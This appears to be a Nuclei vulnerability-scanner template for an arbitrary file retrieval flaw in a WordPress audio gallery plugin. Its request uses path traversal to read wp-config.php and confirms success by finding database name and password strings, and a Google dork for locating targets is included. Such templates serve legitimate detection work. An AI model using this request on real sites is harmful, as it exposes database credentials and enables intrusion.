nuclei-templates/vulnerabilities/wordpress/hb-audio-lfi.yaml

30 lines
777 B
YAML

id: hb-audio-lfi
info:
name: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Retrieval
author: dhiyaneshDK
severity: high
reference:
- https://packetstormsecurity.com/files/136340/WordPress-HB-Audio-Gallery-Lite-1.0.0-Arbitrary-File-Download.html
metadata:
google-dork: inurl:/wp-content/plugins/hb-audio-gallery-lite
tags: wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200